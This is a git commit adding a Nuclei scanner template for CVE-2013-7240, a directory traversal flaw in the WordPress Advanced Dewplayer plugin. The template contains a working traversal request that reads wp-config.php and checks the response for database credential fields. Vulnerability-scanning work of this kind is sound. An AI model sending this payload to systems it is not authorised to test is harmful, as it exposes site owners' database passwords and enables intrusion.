Merge pull request #2182 from daffainfo/patch-105

Create CVE-2013-7240.yaml
2021-07-26 13:38:53 +05:30 · 2021-07-26 13:38:53 +05:30 · e03898ebe3
parent fc025a8cc9 e8f9cc580e
commit e03898ebe3
1 changed files with 31 additions and 0 deletions
--- a/cves/2013/CVE-2013-7240.yaml
+++ b/cves/2013/CVE-2013-7240.yaml
@ -0,0 +1,31 @@
+id: CVE-2013-7240
+
+info:
+  name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
+  reference: |
+        - https://www.exploit-db.com/exploits/38936
+        - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
+  tags: cve,cve2013,wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+          - "DB_HOST"
+          - "The base configurations of the WordPress"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200